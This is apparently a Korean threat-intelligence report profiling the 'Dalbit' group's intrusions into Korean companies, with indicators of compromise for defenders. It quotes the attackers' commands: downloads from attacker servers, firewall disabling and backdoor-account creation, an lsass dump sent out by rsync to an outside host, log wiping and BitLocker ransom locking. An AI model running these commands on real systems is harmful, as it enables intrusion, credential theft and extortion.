0. 개요
해당 내용은 2022년 8월 16일에 공개된 ‘국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹’ 블로그의 연장선으로, 해당 그룹의 행보를 추적한 내용이다.
이 그룹은 과거부터 지금까지 오픈 소스 도구를 주로 사용하고 PDB 등에 정보가 없어 프로파일링의 명확한 특징이 부족했다. 또한 C2(Command&Control) 서버는 국내 기업 서버를 악용하여 피해 기업이 조사를 따로 요청하지 않는 경우 수집할 수 있는 정보가 한정적이었다. 허나 블로그가 공개되고 공격자가 사용 중이던 국내 기업 서버가 일부 차단되자 공격자는 ‘*.m00nlight.top’ 라는 이름의 호스팅 서버를 C2 및 다운로드 서버로 사용하기 시작하였다. 따라서 ASEC에서는 이 그룹을 영어 ‘Moonlight’의 의미인 ‘달빛’에서 가져와 달빗(Dalbit, m00nlight.top)이라 명명한다.
해당 그룹은 2022년부터 지금까지 한국 기업의 50곳 이상 공격을 시도한 것으로 확인되고 있다. 현재까지 공격 받은 기업은 주로 중견이하 업체이나 대기업도 일부 포함되어 있으며, 특히 감염 기업의 30%가 국내의 특정 그룹웨어 솔루션을 사용 중인 것으로 확인되었다. 현재 해당 그룹웨어 제품에 취약점 존재 여부는 명확히 알기 어려우나, 이처럼 외부에 노출된 서버가 취약한 경우 사내 기밀 유출과 랜섬웨어 행위까지 이어져 기업에 지대한 영향을 미칠 수 있다. 또한 이 달빗(Dalbit) 그룹은 감염된 기업 중 일부를 프록시(Proxy) 및 다운로드(Download) 서버로 두어, 또 다른 기업 침투 시에 공격자의 연결책으로 사용되고 있다.
따라서 이번 달빗(Dalbit) 그룹의 공격이 의심된다면 필히 사내 보안 점검을 해야할 것으로 보이며, 잠재적인 2차 피해와 또 다른 기업 피해를 예방하기 위해 선제적 대응할 수 있도록 AhnLab에 신고를 부탁드린다.
1. 국내 피해 기업(산업 분류)
2022년부터 현재까지 확인된 피해 기업은 총 50 곳으로 아래와 같다. 명확히 확인되지 않는 기업은 목록에서 제외하였으며, 피해 기업은 이외에도 더 있을 것으로 추정된다.
각 분류에 대한 설명은 아래와 같다.
- Technology : 소프트웨어나 하드웨어를 다루는 업체
- Industrial : 기계나 도료, 철강 및 금속 등을 다루는 제조업체
- Chemical : 화장품, 제약, 플라스틱 등 업체
- Construction : 건설업체나 건설과 관련된 협회나 단체
- Automobile : 자동차 관련 제조업체
- Semiconductor : 반도체 관련 제조업체
- Education : 교육업체
- Wholesale: 도매업체
- Media : 인쇄 및 미디어업체
- Food : 음식업체
- Shipping : 화물업체
- Hospitality : 레저업체나 관광숙박업체
- Energy : 에너지 업체
- Shipbuilding : 조선업체
- Consulting : 경영 컨설팅 업체
2. 흐름 및 특징
2.1. 요약도
위 그림은 공격자가 B 기업(Company B)을 침해하는 과정이다. 해당 흐름을 간략히 소개하면 다음과 같다.
| 1) Inital Access 공격자는 웹 서버나 SQL 서버 등을 대상으로 취약점을 이용해 시스템에 접근 후 웹쉘과 같은 도구로 제어를 시도한다. 2) Command & Control 웹쉘을 통해 여러 해킹 도구를 다운로드한다. 해킹 도구는 권한 상승 도구와 프록시 도구 네트워크 스캔 도구 등 여러 바이너리가 포함된다. 3) Proxy & Internal Reconnaissance Proxy : 공격자는 FRP(Fast Reverse Proxy)와 같은 프록시 도구를 설치한 뒤 2-1) 공격자가 구축한 호스팅 서버나 2-2) 기감염된 다른 기업(Company A)의 서버를 통해 원격 데스크탑(RDP)으로 연결을 시도한다. Internal Reconnaissance : 네트워크 스캔 도구와 계정 탈취 도구 등을 통해 내부 정찰 및 정보를 습득한다. 4) Lateral Movement 얻은 정보를 통해 연결 가능한 다른 서버 혹은 PC로 이동한다. 이후 측면 이동이 성공한 PC에도 프록시 도구(FRP)를 설치해 공격자가 RDP로 접속할 수 있는 환경을 구성하며, 특정 계정을 추가하거나 미미카츠(Mimikatz)와 같은 자격 증명 탈취 도구를 통해 필요한 권한을 얻는다. 5) Impact 최종적으로 공격자가 원하는 정보를 모두 탈취했다면 BitLocker를 이용해 특정 드라이브를 잠그고 돈을 요구한다. |
다음은 달빗(Dalbit) 그룹의 주요 특징으로 아래와 같다.
2.2. 달빗(Dalbit)의 특징
| 목록 | 설명 |
|---|---|
| 공격자 C2 서버 | 다운로드 및 C2(Command&Control) 서버 : 국내 기업 서버 또는 호스팅 서버 서버 중 반 이상이 국내 기업 서버 악용 호스팅 서버는 주로 *.m00nlight.top 혹은 IP 형태의 주소를 사용 |
| RDP 제어 시도 | 감염 후 주로 RDP 접근 시도 RDP 연결을 위해 프록시 도구 혹은 Gotohttp 사용 |
| 프록시 도구 | 주요 프록시 도구는 FRP와 LCX(Htran) 이외에 NPS와 ReGeorg 등을 사용 |
| 사용자 계정 추가 | net 명령어를 통해 계정 추가 계정 정보( ID : ‘main’ / PW : ‘ff0.123456’ ) |
| 오픈 소스 도구 | 대부분 누구나 쉽게 구할 수 있는 오픈 소스 도구 사용 특히 중국어로 작성된 도구가 많음 |
| 회피 | 해킹 툴, 진단 우회시 VMProtect 제품 사용 Security 이벤트 로그 삭제 |
| 탈취 정보 | 사용자 계정 정보 이메일 정보 화면 유출 설치된 프로그램 정보 |
3. 사용한 도구 및 침해 과정
3.1. 사용 도구 및 악성코드
| 웹쉘 | 다운로더 | 권한 상승 | 프록시 | 내부 정찰 |
|---|---|---|---|---|
| Godzilla ASPXSpy AntSword China Chopper | Certutil (Windows CMD) Bitsadmin (Windows CMD) | BadPotato JuicyPotato SweetPotato RottenPotato EFSPotato CVE-2018-8639 CVE-2019-1458 | FRP LCX NPS ReGeorg | FScan NbtScan TCPScan Goon Nltest (Windows CMD) |
| 측면 이동 | 정보 수집 및 유출 | 백도어 | 파일 암호화 | 회피 |
|---|---|---|---|---|
| RDP PsExec RemCom Winexec | Wevtutil (Windows CMD) WMI (Windows CMD) ProcDump Dumpert EML Extractor(제작) Mimikatz Rsync | CobaltStrike MetaSploit BlueShell Ladon | BitLocker (Windows CMD) | Security 로그 삭제 (Windows CMD) 방화벽 OFF (Windows CMD) AV 제품 삭제 시도 VMProtect Packing |
공격자가 직접 제작한 도구는 메일을 유출하는 도구 1건으로 보이며, 나머지는 윈도우 정상 프로그램을 사용하거나 검색 시 쉽게 구할 수 있는 도구를 사용하였다.
3.2. 침해 과정
3.2.1. 초기 침투
공격 대상은 주로 국내의 특정 그룹웨어가 설치된 서버나 취약한 웹 서버, 메일 서버(Exchange Server) 그리고 SQL 서버로 추정된다. 공격자는 CVE-2017-10271과 같은 WebLogic 취약점이나 파일 업로드 취약점을 악용해 웹쉘(WebShell)을 업로드하였으며, 일부는 SQL Server 의 명령 프롬프트(xp_cmdshell)를 이용한 것으로 보인다.
공격자가 주로 사용한 웹쉘은 Godzilla, ASPXSpy, AntSword, China Chopper 순으로, Godzilla를 가장 많이 사용했으며 일부 기타 웹쉘도 확인되었다.
설치된 웹쉘의 경로는 다음과 같다.
| – 인사채용(파일 업로드 취약점) D:\WEB\********recruit\css\1.ashx D:\WEB\********recruit\css\4.ashx D:\WEB\********recruit\common\conf.aspx ... – 파일 업로드 취약점 D:\UploadData\***********\****_File\Data\Award\1.ashx D:\UploadData\***********\****_File\Data\Award\2.aspx D:\UploadData\***********\****_File\Data\Award\3.aspx D:\**웹서비스\********\*****Editor\sample\photo_uploader\File\conf.aspx D:\**웹서비스\********_논문투고\Include\file.aspx ... – 특정 그룹웨어 D:\Web\(그룹웨어)\cop\1.ashx D:\Web\(그룹웨어)\app\4.ashx D:\Web\(그룹웨어)\bbs\4.asmx D:\Web\(그룹웨어)\erp\tunnel.aspx (ReGeorg) D:\inetpub\(그룹웨어)\image\2.asmx D:\inetpub\(그룹웨어)\image\2.aspx C:\(그룹웨어)\Web\(그룹웨어)\cop\conf.aspx C:\(그룹웨어)\Web\(그룹웨어)\cop\1.ashx C:\(그룹웨어)\Web\(그룹웨어)\cop\1.asmx C:\(그룹웨어)\Web\(그룹웨어)\cop\1.aspx … – 메일 서버(Exchange Server) D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\aa.aspx D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\11.aspx C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\91080f08\2694eff0\app_web_defaultwsdlhelpgenerator.aspx.cdcab7d2.sjx_41yb.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\91080f08\2694eff0\app_web_ldaj2kwn.dll … – Weblogic D:\***\wls1035\domains\************\servers\*******\tmp\************\uddiexplorer\gcx62x\war\modifyregistryhelp.jsp D:\***\wls1035\domains\************\servers\*******\tmp\************\wls-wsat\zfa3iv\war\eee.jsp D:\***\wls1035\domains\************\servers\*******\tmp\************\wls-wsat\zfa3iv\war\error.jsp D:\Oracle\**********\user_projects\domains\*************\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\123.jsp D:\Oracle\**********\user_projects\domains\*************\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\test.jsp D:\Oracle\**********\user_projects\domains\*************\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\aaa.jsp … –Tomcat C:\(Tomcat)\webapps\dd\sb.jsp C:\(Tomcat)\webapps\ddd\index.jsp C:\(Tomcat)\webapps\docs\update.jsp C:\(Tomcat)\webapps\tmp\shell.jsp |
3.2.2. 다운로드
공격자는 기본적으로 설치된 윈도우 정상 프로그램을 통해 다른 해킹 도구를 다운로드한다. 보통 침투 시 웹쉘을 사용하기 때문에 cmd와 같은 명령어 프로세스를 제외하면 부모 프로세스는 w3wp.exe, java.exe, sqlserver.exe, tomcat*.exe 와 같은 웹 서버 프로세스에 의해 수행된다. 다운로드 받는 파일은 권한 상승 도구와 프록시 도구 그리고 네트워크 스캔 도구 등 공격자가 필요한 파일을 받아온다. 다운로드 명령은 아래와 같다.
(참고로 악용된 국내 기업 서버의 경우 주소를 전체 공개하지 않는다.)
1) Certutil
| > certutil -urlcache -split -f hxxp://www.ive***.co[.]kr/uploadfile/ufaceimage/1/update.zip c:\programdata\update.exe (frpc) > certutil -urlcache -split -f hxxp://121.167.***[.]***/temp/8.txt c:\programdata\8.ini (frpc.ini) > certutil -urlcache -split -f hxxp://103.118.42[.]208:8080/frpc.exe frpc.exe … |
2) Bitsadmin
| > bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc) > bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini) … |
공격자가 다운로드 받은 해킹 도구 및 악성코드는 주로 아래의 경로에서 확인되었다.
| %ALLUSERSPROFILE% %SystemDrive%\temp %SystemDrive%\perflogs %SystemDrive%\nia %SystemDrive%\.tmp %SystemRoot% %SystemRoot%\debug %SystemRoot%\temp |
따라서 침해가 의심되는 경우 해당 경로의 파일을 점검할 필요가 있다.
3.2.3. 권한 상승 및 계정 추가
공격자는 권한 상승을 위해 Potato(BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato)와 깃허브에 공개된 POC (CVE-2018-8639, CVE-2019-1458)를 주로 사용한다. 권한 상승 후 아래와 같은 계정을 추가하는 것이 특징이다.
아래의 sp.exe는 SweetPotato 도구이다.
| > sp.exe “whaomi” (권한 확인) > sp.exe “netsh advfirewall set allprofiles state off” (방화벽 OFF) > sp.exe “net user main ff0.123456 /add & net localgroup administrators main /add” (계정 추가) |
관심있게 봐야할 부분은 공격자가 추가한 계정 이름이다. 이는 다른 침해 기업에서도 ‘main’이라는 공격자의 계정이 확인되었다.
공격자는 계정을 추가하는 방법 외에 탈취된 관리자 계정을 사용하기도 하였다.
| > wmic /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$ process call create “cmd.exe /c c:\temp\s.bat” |
3.2.4. 프록시 설정
공격자는 서버에 침투 후 RDP 통신을 사용하기 위해 프록시를 사용하여 접근한다. 프록시 도구는 주로 FRP와 LCX가 사용되었으며, 일부 기업에서는 ReGeorg나 NPS 또는 RSOCKS 등도 확인되었다. 또한 특정 침해 기업에서는 FRP와 LCX 등 여러 프록시 도구가 한 곳에서 확인되기도 하였으며, 내부 전파까지 이어진 경우 다수의 FRP 설정 파일(.ini)이 발견되기도 하였다. 이는 접근 가능한 PC 중 먹잇감이 많은 경우 공격자가 FRP를 추가로 설치하면서 다수의 설정 파일이 사용된 것으로 보고 있다. 또 해당 그룹이 사용하는 LCX는 오픈 소스와 기능은 동일하지만 깃허브에 공개된 버전이 아닌 중국인이 임의로 컴파일한 바이너리가 사용되었다.
이러한 FRP와 LCX 등 프록시 도구에는 포워딩 방식이나 지원하는 프로토콜의 차이가 존재한다. 그러나 TI 보고서 ‘다양한 원격 제어 도구들을 악용하는 공격 사례 분석 보고서‘에서 차이에 대한 설명과 실 감염 사례 그리고 재현 및 네트워크 패킷까지 모두 다뤘기 때문에 이 글에서는 해당 부분을 따로 언급하지 않는다.
1) FRP(Fast Reverse Proxy)
이 그룹에 침해 당한 경우 서버와 PC 디바이스 모두에 FRP 설정 파일(.ini)이 확인되었다. 아래는 실제 침해 기업의 한 사례이다.
특히 달빗(Dalbit) 그룹은 주로 Socks5 프로토콜을 이용해 통신하였다. Socks5 프로토콜은 OSI 7계층 중 5계층 프로토콜로 4계층과 7계층 사이에 있어 HTTP, FTP, RDP 등 여러 요청을 처리할 수 있다. 이에 따라 공격자는 공격자 서버에 Socks5를 다룰 수 있는 Proxifier와 같은 프록시 연결 도구를 이용한다면 RDP를 통한 원격제어가 가능하며, 내부 PC로 연결 가능한 경우 측면 이동(Lateral Movement) 또한 수행할 수 있다. 즉, 설정 파일을 Socks5 프로토콜로 해두면 더 이상 수정할 필요 없이 여러 요청을 처리할 수 있어 더 자유롭다.
다음은 공격자가 사용한 FRP 파일 이름 및 명령어이다. 아래는 가장 많이 사용된 순으로 정리하였다.
- FRP 파일명
| update.exe debug.exe main.exe info.exe Agent.exe frpc.exe test.exe zabbix.exe winh32.exe cmd.exe |
- FRP 명령어
| > update.exe -c frpc.ini > update.exe -c 8080.ini > update.exe -c 8.ini > info.zip -c frpc__8083.ini > debug.exe -c debug.ini > debug.exe -c debug.log > debug.exe -c debug.txt > frpc.exe -c frpc__2381.ini > cmd.exe /c c:\temp\****\temp\frpc.ini … |
또한 특정 기업에서는 FRP를 ‘debug’라는 이름으로 작업 스케줄러(schtasks)에 등록하여 지속성을 유지하였다. 아래와 같이 등록된 스케줄러가 실행된 것이 확인되었다.
| > schtasks /tn debug /run |
2) LCX(Htran)
달빗(Dalbit)은 특정 중국인이 컴파일한 LCX(Htran) 바이너리를 사용하였다. 이는 기존 바이너리와 기능이 동일하지만 바이너리 제작자의 닉네임이 명시되어 있다.
해당 바이너리를 제작한 사람은 닉네임이 ‘折羽鸿鹄'(QQ:56345566)으로 확인된다. 이 제작자가 공격자일 가능성은 매우 낮지만, 이 바이너리는 단순히 검색만으로 다운 받을 수 없기 때문에 공격자는 중국과 연관이 있을 것으로 추정된다.
설치된 파일명 및 실행은 다음과 같다.
- LCX 파일명
| lcx3.exe lcx.exe update.exe |
- LCX 명령어
| > update.exe -slave 1.246.***.*** 110 127.0.0.1 3389 > lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389 … |
위 LCX C2는 국내 기업 서버이기 때문에 마스킹하여 표기 하였다.
3.2.5. 내부 정찰
네트워크 스캔에는 주로 Fscan과 NBTScan 도구가 흔히 사용되었으며, 일부 사례에서는 TCP Scan 및 Goon이 확인되었다.
Goon은 Golang으로 만들어진 네트워크 스캐닝 도구로 기본적인 포트 스캔 뿐만 아니라 Tomcat, MSSQL, MYSQL의 계정 등도 스캔할 수 있는 도구이다. 해당 도구 또한 중국어로 만들어진 것을 확인할 수 있다.
3.2.6. 정보 탈취
주 탈취 정보는 LSASS Dump 정보, 특정 계정의 EML 파일이며 기업에 따라 WMIC 명령어로 설치된 프로그램을 확인하거나 특정 피해자 PC에서는 일정 시간마다 공격자 서버에 화면 이미지를 송출하는 것이 확인되었다.
1) 자격 증명 정보 추출(LSASS Dump)
공격자는 타겟에 따라 미미카츠(Mimikatz)를 설치하지 않고 자격 증명 정보 추출을 시도하였다. 이는 Lsass.exe 프로세스를 덤프하는 방법으로, 이 덤프 파일 내부에는 크리덴셜 정보가 포함되어 있기 때문에 Mimikatz나 Pypykatz 같은 도구로 해당 PC의 자격 증명 정보를 얻을 수 있다. 참고로 Mimikatz에 대한 상세한 내용은 TI 보고서 ‘미미카츠를 이용한 내부망 전파 기법 분석 보고서‘에서 확인할 수 있다.
공격자가 Mimikatz 없이 수행한 자격 증명 정보를 탈취 방법은 다음과 같다.
1-1) Dumpert
오픈소스 Dumpert는 API 후킹 우회 및 OS 버전에 맞게 수행하는 도구로 MiniDumpWriteDump() API를 사용해 lsass.exe 프로세스를 덤프한다. 공격자는 코드를 수정하여 덤프 파일의 경로 변경 및 로그 출력 기능 등을 제거하였다.
위 사진을 보면 우측의 경우 경로 및 출력되는 문자열이 제거된 것 외에 동일함을 볼 수 있다.
현재까지 확인된 덤프 파일의 경로는 모두 ‘%SystemRoot%\temp’로 아래와 같다.
| %SystemRoot%\temp\duhgghmpert.dmp %SystemRoot%\temp\dumpert.dmp %SystemRoot%\temp\tarko.dmp %SystemRoot%\temp\lsa.txt … |
1-2 ) Procdump
Procdump 도구는 Microsoft에서 제공하는 정상 유틸리티 프로그램으로 프로세스 덤프 기능을 제공한다. 공격자는 해당 도구를 통해 아래와 같이 덤프를 수행하였다.
이후 공격자는 Rsync(Remote Sync)라는 도구를 통해 덤프 파일 공격자 서버로 전송하였다. 아래는 공격자가 정보 유출을 시도한 실제 사례이다.
| > svchost.exe -accepteula -ma lsass.exe web_log.dmp > rsync -avz –port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip |
2) 메일 추출
해당 샘플은 Golang으로 만들어진 메일 추출 도구로 현재 유일하게 공격자가 만든 도구로 추정되고 있다. 이는기업의 Exchange 메일 서버를 대상으로 EWS(Exchange Web Service)를 통해 특정 계정 메일을 EML파일로 추출하는 기능을 가지고 있다. 인자로는 Exchange 서버 주소와, 계정명, 해당 계정의 NTLM 패스워드 해시, 날짜 및 시간 등이 존재한다. 실행 시 해당 계정의 모든 메일함에서 인자로 받은 시간을 기준으로 모든 메일을 추출하여 EML 파일로 저장한다.
참고로 해당 바이너리의 PDB 정보는는 ‘fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff’로 무의미하다.
3) 화면 유출
공격자는 특정 PC의 화면을 공격자 서버로 송출하였다. 현재 화면을 캡쳐하는 바이너리가 확인되지 않았으나, 감염된 PC의 화면이 송출되는 공격자 서버가 확인되었다. 이는 5~10초 간격으로 특정 기업의 침해 PC의 화면이 송출되고 있었다.
| 공격자의 화면 송출 서버 : hxxp://91.217.139[.]117:8080/1.bat |
이는 온전히 이미지만 송출되었으며 원격으로 조종할 수 없고 오디오 등은 출력되지 않았다.
또한 화면이 송출되고 있던 공격자 서버(91.217.139[.]117)는 또 다른 기업에서 다운로드 서버로도 사용되고 있었다.
| >certutil -urlcache -split -f hxxp://91.217.139[.]117:8080/calc32.exe >certutil -split -urlcache -f hxxp://91.217.139[.]117:8443/log.ini c:\temp >bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc) >bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini) |
4) 설치된 프로그램 조회 및 로그인 정보
공격자는 WMIC 명령어를 통해 설치된 프로그램을 확인하였다.
| > wmic product get name,version |
또한 이벤트 로그 중 특정 이벤트 ID를 발생한 도메인 계정 정보에 대해 수집하였다. 생성된 파일은 c:\temp\EvtLogon.dat에 존재한다.
| Event ID | 의미 |
| 4624 | 로그인 성공 |
| 4768 | 커버로스 인증 요청 |
| 4776 | NTLM 인증 시도 |
| > wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true >> c:\temp\EvtLogon.dat |
3.2.7. 파일 암호화
해당 내용은 과거 블로그를 통해 자세히 소개되었다. 공격자는 윈도우 유틸리티인 BitLocker를 통해 특정 드라이브를 암호화하여 금액을 요구하였다. 현재 여러 피해 기업이 더 확인되고 있다.
- BitLocker 명령어
| > “C:\Windows\System32\BitLockerWizardElev.exe” F:\ T > manage-bde -lock -ForceDismount F: > manage-bde -lock -ForceDismount e: > “c:\windows\system32\bitlockerwizardelev.exe” e:\ t > “c:\windows\system32\bitlockerwizardelev.exe” f:\ u |
아래는 공격자가 사용하는 랜섬노트이다. 공격자는 startmail.com, onionmail.com과 같은 익명 메일 서비스를 이용하였다.
랜섬노트 다운로드로 추정되는 명령어는 다음과 같다.
| > certutil -urlcache -split -f hxxp://175.24.32[.]228:8888/readme c:\windows\temp\readme |
3.2.8. 우회
1) VMProtect Packing
공격자는 바이너리를 업로드 후 진단이 되었을 때 VMProtect로 패킹을 하여 진단 우회를 시도하였다.
| – 권한 상승 도구 %ALLUSERSPROFILE%\badpotatonet4.exe %ALLUSERSPROFILE%\BadPotatoNet4.vmp.exe %ALLUSERSPROFILE%\SweetPotato.exe %ALLUSERSPROFILE%\SweetPotato.vmp.exe %ALLUSERSPROFILE%\jc.vmp.exe %SystemDrive%\nia\juicypotato.vmp1.exe %SystemDrive%\nia\juicypotato.vmp.exe … – 프록시 도구 E:\WEB\*****\data\frpc.vmp.exe %ALLUSERSPROFILE%\lcx.exe %ALLUSERSPROFILE%\lcx_VP.exe %SystemDrive%\Temp\lcx.exe %SystemDrive%\Temp\lcx_VP.exe %SystemDrive%\Temp\svchost.exe (FRP) %SystemDrive%\Temp\frpc.vmp.exe … |
2) Wevtutil을 이용한 윈도우 이벤트 로그 삭제
| Security 이벤트 로그 삭제 > cmd.exe /c wevtutil cl security Application 로그 삭제 > cmd.exe wevtutil.exe el > cmd.exe wevtutil.exe cl “application” |
3) 방화벽 OFF
| sp.exe “netsh advfirewall set allprofiles state off” |
4. 결론
달빗(Dalbit) 해킹 그룹은 국내 기업의 취약한 서버를 대상으로 공격을 시도하였으며 이는 중견 이하 업체뿐만 아니라 일부 대기업에서도 로그가 올라오고 있다. 특히 피해 기업 중 30%가 국내의 특정 그룹웨어 제품을 사용 중인 것으로 확인되었다. 또 해당 그룹은 침입 초기에 사용한 웹쉘부터 최종 단계인 랜섬웨어까지 누구나 쉽게 구할 수 있는 도구를 사용하고 있으며 이 중, 중국 커뮤니티에서 구한 것으로 추정되는 프록시 도구나 중국어로 설명된 도구 그리고 이 글에서 언급되지 않은 중국어 도구도 존재한다. 따라서 공격자는 중국어로 소개되는 도구를 주로 사용한 것으로 보아 중국과 일부 연관이 있을 것으로 추정된다.
서버 관리자는 감염 의심 시 이 글에서 소개된 공격자의 주 다운로드 경로와 주 계정명(‘main’) 그리고 IOC 등을 확인해야 하며, 만약 의심 징후 확인 시 안랩에 즉시 신고하여 2차 피해를 줄여야 할 것으로 보인다. 또한 관리자는 서버 구성 환경이 취약할 경우 최신 버전으로 패치해 기존 취약점을 사전 방지하며 외부에 공개된 서버 중 관리되지 않는 서버가 있다면 필히 점검해야 할 것으로 보인다.
5. IOC
참고로 ASEC 블로그에서는 공격자가 악용 중인 국내 기업 서버의 IP를 공개하지 않는다.
- Mitre Attack
| Execution | Persistence | Privilege Escalation | Credential Access | Discovery | Defense Evasion | Lateral Movement | Collection | Exfiltration | Command and Control | Impact | Resource Development |
| – Command and Scripting Interpreter(T1059) – Windows Management Instrumentation(T1047) – System Service(T1569) | – Scheduled Task/Job(T1053) – Create Account(T1136) – Server Software Component(T1505) – Account Manipulation(T1098) | – Access Token Manipulation(T1134) – Exploitation for Privilege Escalation(T1068) | – OS Credential Dumping (T1003) | – Remote System Discovery(T1018) – Network Service Discovery(T1046) | – Impair Defenses(T1562) – Indicator Removal(T1070) | – Remote Services(T1021) – Lateral Tool Transfer(T1570) | – Data from Local System(T1005) – Account Discovery: Email Account(1087.003) – Email Collection(T1114) – Screen Capture(T1113) | – Exfiltration Over Web Service(T1567) | – Proxy(T1090) – Ingress Tool Transfer(T1105) | – Data Encrypted for Impact(T1486) | – Stage Capabilities: Upload Malware(T1608.001) |
- 진단명
| WebShell/Script.Generic (2020.12.11.09) WebShell/ASP.ASpy.S1361 (2021.02.02.03) WebShell/ASP.Generic.S1855 (2022.06.22.03) WebShell/ASP.Small.S1378 (2021.02.24.02) WebShell/JSP.Godzilla.S1719(2021.12.03.00) WebShell/JSP.Chopper.SC183868(2022.10.15.01) WebShell/JSP.Generic.S1363 (2021.01.27.03) Backdoor/Script.Backdoor (2015.01.04.00) WebShell/JSP.Generic.S1956 (2022.11.14.00) Trojan/Script.Frpc (2022.12.17.00) JS/Webshell (2011.08.08.03) HackTool/Win.Fscan.C5334550(2023.01.27.00) HackTool/Win.Fscan.C5230904(2022.10.08.00) HackTool/Win.Fscan.R5229026(2022.10.07.03) Trojan/JS.Agent(2022.03.16.02) Unwanted/Win32.TCPScan.R33304(2012.08.17.00) HackTool/Win.Scanner.C5220929(2022.08.09.02) HackTool/Win.SweetPotato.R506105 (2022.08.04.01) Exploit/Win.BadPotato.R508814 (2022.08.04.01) HackTool/Win.JuicyPotato.R509932 (2022.08.09.03) HackTool/Win.JuicyPotato.C2716248 (2022.08.09.00) Exploit/Win.JuicyPotato.C425839(2022.08.04.01) Exploit/Win.SweetPotato.C4093454 (2022.08.04.01) Trojan/Win.Escalation.R524707(2022.10.04.02) Trojan/Win.Generic.R457163(2021.12.09.01) HackTool/Win64.Cve-2019-1458.R345589(2020.07.22.06) Malware/Win64.Generic.C3164061 (2019.04.20.01) Malware/Win64.Generic.C3628819 (2019.12.11.01) Exploit/Win.Agent.C4448815 (2021.05.03.03) Trojan/Win.Generic.C4963786 (2022.02.11.04) Trojan/Win.Exploit.C4997833 (2022.03.08.01) Exploit/Win.Agent.C5224192 (2022.08.17.00) Exploit/Win.Agent.C5224193 (2022.08.17.00) Trojan/Win32.RL_Mimikatz.R290617(2019.09.09.01) Trojan/Win32.Mimikatz.R262842(2019.04.06.00) Trojan/Win.Swrort.R450012(2021.11.14.01) HackTool/Win.Lsassdump.R524859(2022.10.05.00) HackTool/Win.ProxyVenom.C5280699(2022.10.15.01) Unwanted/Win.Frpc.C5222534 (2022.08.13.01) Unwanted/Win.Frpc.C5218508 (2022.08.03.03) Unwanted/Win.Frpc.C5218510 (2022.08.03.03) Unwanted/Win.Frpc.C5218513 (2022.08.03.03) HackTool/Win.Frpc.5222544 (2022.08.13.01) HackTool/Win.Frp.C4959080 (2022.02.08.02) HackTool/Win.Frp.C5224195 (2022.08.17.00) Unwanted/Win.Frpc.C5162558 (2022.07.26.03) Malware/Win.Generic.C5173495 (2022.06.18.00) HackTool/Win.LCX.C5192157 (2022.07.04.02) HackTool/Win.LCX.R432995(2023.01.06.01) HackTool/Win.Rsocx.C5280341(2022.10.15.00) Backdoor/Win.BlueShell.C5272202(2022.10.05.00) Trojan/Win.BlueShell.C5280704(2022.10.15.01) Backdoor/Win.CobaltStrike.R360995(2022.09.20.00) Unwanted/Win.Extractor.C5266516(2022.10.01.00) Trojan/Win.RemCom.R237878(2023.01.07.00) |
[IOC]
- MD5 (정상 파일 제외)
| – 웹쉘 0359a857a22c8e93bc43caea07d07e23 85a6e4448f4e5be1aa135861a2c35d35 4fc81fd5ac488b677a4c0ce5c272ffe3 c0452b18695644134a1e38af0e974172 6b4c7ea91d5696369dd0a848586f0b28 96b23ff19a945fad77dd4dd6d166faaa 88bef25e4958d0a198a2cc0d921e4384 c908340bf152b96dc0f270eb6d39437f 2c3de1cefe5cd2a5315a9c9970277bd7 e5b626c4b172065005d04205b026e446 27ec6fb6739c4886b3c9e21b6b9041b6 612585fa3ada349a02bc97d4c60de784 21c7b2e6e0fb603c5fdd33781ac84b8f c44457653b2c69933e04734fe31ff699 e31b7d841b1865e11eab056e70416f1a 69c7d9025fa3841c4cd69db1353179cf fca13226da57b33f95bf3faad1004ee0 af002abd289296572d8afadfca809294 e981219f6ba673e977c5c1771f86b189 f978d05f1ebeb5df334f395d58a7e108 e3af60f483774014c43a7617c44d05e7 c802dd3d8732d9834c5a558e9d39ed37 07191f554ed5d9025bc85ee1bf51f975 61a687b0bea0ef97224c7bd2df118b87 …(생략) – 권한 상승 9fe61c9538f2df492dff1aab0f90579f ab9091f25a5ad44bef898588764f1990 87e5c9f3127f29465ae04b9160756c62 ab9091f25a5ad44bef898588764f1990 4bafbdca775375283a90f47952e182d9 0311ee1452a19b97e626d24751375652 acacf51ceef8943f0ee40fc181b6f1fa 3cbea05bf7a1affb821e379b1966d89c 10f4a1df9c3f1388f9c74eb4cdf24e7c b5bdf2de230722e1fe63d88d8f628ebc edb685194f2fcd6a92f6e909dee7a237 e9bd5ed33a573bd5d9c4e071567808e5 fbae6c3769ed4ae4eccaff76af7e7dfe 937435bbcbc3670430bb762c56c7b329 fd0f73dd80d15626602c08b90529d9fd 29274ca90e6dcf5ae4762739fcbadf01 784becfb944dec42cccf75c8cf2b97e3 7307c6900952d4ef385231179c0a05e4 bcfca13c801608a82a0924f787a19e1d 75fe1b6536e94aaee132c8d022e14f85 d6cb8b66f7a9f3b26b4a98acb2f9d0c5 323a36c23e61c6b37f28abfd5b7e5dfe 7b40aa57e1c61ecd6db2a1c18e08b0af 3665d512be2e9d31fc931912d5c6900e – 네트워크 스캔 1aca4310315d79e70168f15930cc3308 5e0845a9f08c1cfc7966824758b6953a 9b0e4652a0317e6e4da66f29a74b5ad7 d8d36f17b50c8a37c2201fbb0672200a 